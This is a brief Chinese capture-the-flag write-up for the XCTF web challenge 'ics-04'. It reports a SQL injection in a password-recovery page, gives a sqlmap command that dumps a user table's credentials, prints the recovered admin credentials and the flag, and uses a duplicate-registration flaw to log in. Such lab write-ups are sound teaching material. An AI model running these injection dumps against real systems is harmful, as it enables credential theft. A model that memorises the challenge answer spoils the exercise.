[xctf]ics-04

类型：web
网址：https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=4918
描述：工控云管理系统新添加的登录和注册页面存在漏洞，请找出flag
一句话总结：sql注入、业务逻辑漏洞

过程：
有三个可以访问的功能，注册、登录和找回密码
注册功能：没有sql注入，一个账号可以重复注册漏洞
登录功能：没有sql注入，一个账号不同密码能够登录
找回密码功能：存在sql注入，payload：

python sqlmap.py -u "http://111.198.29.45:30842/findpwd.php" --data="username=1" -D cetc004 -T user -C "username,password" --dump

得到账号：c3tlwDmIn23，密码：2f8667f381ff50ced6a3edc259260ba9
利用重复注册账号漏洞，注册账号c3tlwDmIn23，密码123456，登录成功，取得flag
Flag:
cyberpeace{f806dac1f9e60f3b2bc4e610cb21d861}